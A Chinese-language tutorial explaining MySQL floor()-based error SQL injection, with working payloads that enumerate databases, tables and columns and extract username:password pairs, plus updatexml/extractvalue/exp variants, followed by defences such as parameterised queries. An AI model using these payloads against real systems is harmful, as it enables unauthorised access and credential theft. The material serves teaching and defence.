在网络安全领域,SQL注入是一种历久弥新的攻击手段,其中报错注入因其独特的利用方式而备受关注,当传统的联合查询(UNION)注入因权限、回显点限制而无法奏效时,报错注入便成为攻击者获取敏感信息的重要突破口,本文将深入探讨一种经典的MySQL报错注入技术——基于floor()函数的报错注入,剖析其核心原理、攻击步骤,并提供有效的防御策略。
核心原理:rand()与group by的巧妙碰撞
floor报错注入的核心,并非floor()函数本身,而是它与其他函数组合使用时,在特定SQL查询结构中触发的一种“竞态条件”,其关键组件包括:
count(*):聚合函数,用于计算行数。rand():随机函数,生成一个0到1之间的浮点数。floor(rand() * 2):将rand()的结果乘以2后向下取整,因此其结果必然是0或1。group by:分组子句,将结果集按照一个或多个列进行分组。
当这些组件被组合在一起,select count(*), concat(payload, floor(rand()*2)) as x from table group by x 时,MySQL的执行逻辑会引发一个关键错误,具体过程如下:
group by子句需要建立一个临时表来存储分组结果,在处理每一行数据时,它会先计算floor(rand()*2)的值(假设为0),然后去临时表中查找这个值作为键是否存在。- 如果键(0)不存在,MySQL会准备将这个新键(0)插入到临时表中,在插入之前,
count(*)需要再次计算floor(rand()*2)的值以确定要插入的行。 - 问题就在这里:
rand()函数被第二次调用,它可能生成一个与第一次不同的值(这次生成了1)。 group by试图将一个它刚刚认为“不存在”的键(0)和一个新计算出的值(1)一起插入,或者更常见的情况是,group by在后续行中再次计算rand(),得到了一个已经存在于临时表中的键(第一行插入了0,第二行又计算出了0),但由于rand()的随机性,在group by和count(*)的多次调用中,可能导致主键冲突。- 这种不确定性导致了MySQL在处理临时表主键时发生混乱,最终抛出
Duplicate entry '...' for key 'group_key'的错误。
攻击者的高明之处在于,他们将想要查询的数据(如数据库名、表名)通过concat()函数与floor(rand()*2)拼接在一起,当报错发生时,这个拼接后的字符串就会作为“重复的条目”被完整地打印在错误信息中,从而实现了信息泄露。
攻击步骤与Payload示例
假设我们有一个存在注入点的URL:http://example.com/user.php?id=1。
判断注入点
通过添加单引号、and 1=1、and 1=2等方式确认存在SQL注入。
获取基本信息(如数据库名)
构造如下Payload:
and (select 1 from (select count(*),concat((select database()),floor(rand()*2))x from information_schema.tables group by x)a)select database():获取当前数据库名。concat(...):将数据库名与floor(rand()*2)的结果拼接。from information_schema.tables:选择一个行数足够多的表(如information_schema.tables),以确保group by能触发错误,如果行数太少,可以union一个虚拟表增加行数。- 最外层的
select 1 from (...) a:是为了将子查询作为一个派生表来执行,这是MySQL语法的要求。
执行后,页面可能会返回类似错误:Duplicate entry 'security_db1' for key 'group_key',其中security_db就是数据库名。
获取表名
获取security_db数据库中的第一个表名:
and (select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema='security_db' limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a)通过修改limit的偏移量(如limit 1,1, limit 2,1),可以逐个获取所有表名。
获取列名
假设获取到表名为users,获取其第一个列名:
and (select 1 from (select count(*),concat((select column_name from information_schema.columns where table_schema='security_db' and table_name='users' limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a)获取最终数据
假设获取到列名为username和password,获取第一条数据:
and (select 1 from (select count(*),concat((select concat(username,0x3a,password) from security_db.users limit 0,1),floor(rand()*2))x from information_schema.tables group by x)a)0x3a是冒号(:)的十六进制表示,用于分隔用户名和密码,使结果更清晰。
Payload结构解析
为了更清晰地理解,下表分解了Payload的核心结构:
| 组件部分 | 函数/语法示例 | 作用说明 |
|---|---|---|
| 聚合与分组 | count(*) ... group by x |
创建触发报错的查询环境,是报错的基础。 |
| 随机与取整 | floor(rand()*2) |
生成0或1,引入不确定性,是导致主键冲突的关键。 |
| 数据拼接 | concat((子查询), floor(rand()*2)) |
将我们想要窃取的数据(子查询结果)与随机数拼接,使其能被带入错误信息。 |
| 信息源 | select ... from information_schema... |
提供数据库元数据(表名、列名)或实际数据的子查询。 |
| 执行保障 | from information_schema.tables |
选择一个行数充足的表,确保group by有足够的数据行来触发竞态条件。 |
| 派生表包装 | select 1 from (...) a |
将整个查询包装成一个派生表,满足SQL语法要求。 |
防御措施
防范floor报错注入及其他所有SQL注入的根本方法在于将代码与数据严格分离。
- 使用参数化查询(预编译语句):这是最有效、最推荐的防御方法,通过将SQL查询模板和用户输入分开处理,数据库引擎永远不会将用户输入解释为SQL代码的一部分,从而从根本上杜绝了注入。
- 严格的输入验证与净化:对所有来自用户的输入进行严格的检查,验证数据类型、长度、格式,并过滤或转义特殊字符(如单引号、双引号、分号等)。
- 最小权限原则:为Web应用配置的数据库账户应遵循最小权限原则,禁止其对
information_schema等系统表的访问权限,除非业务确实需要,避免使用root或db_owner等高权限账户连接数据库。 - Web应用防火墙(WAF):部署WAF可以在应用层之前拦截已知的攻击流量,包括常见的SQL注入Payload,提供一道额外的安全防线。
相关问答FAQs
Q1: 为什么有时使用floor报错注入,页面没有返回错误信息,而是显示正常或空白?
A1: 这通常是因为group by子句操作的数据行数不足。rand()的竞态条件需要在处理至少两行数据时才可能被触发,如果from后面的表只有一行数据,group by不会发生重复,自然也就不会报错,解决方法是确保查询的数据源有多行,可以使用information_schema.tables(通常行数很多),或者通过union select连接多个查询来人为增加行数。
*Q2: 除了`floor(rand()2)`,还有没有其他函数可以用来实现MySQL报错注入?**
A2: 是的,MySQL报错注入有多种技术路径,除了基于rand()的floor报错,还有其他几种常见的方法:
- XPath函数报错:利用
updatexml()或extractvalue()函数处理非法XPath表达式时的报错。and updatexml(1,concat(0x7e,(select database()),0x7e),1)。 - 几何函数报错:利用
GeometryCollection()等几何函数在处理非法参数时的报错。 - 大数溢出报错:利用
exp()函数,当传入的参数过大(如exp(~(select * from (select user())a)))时会导致数值溢出而报错。 这些方法虽然原理不同,但目标一致:都是将查询结果嵌入到数据库的错误信息中,从而实现数据泄露。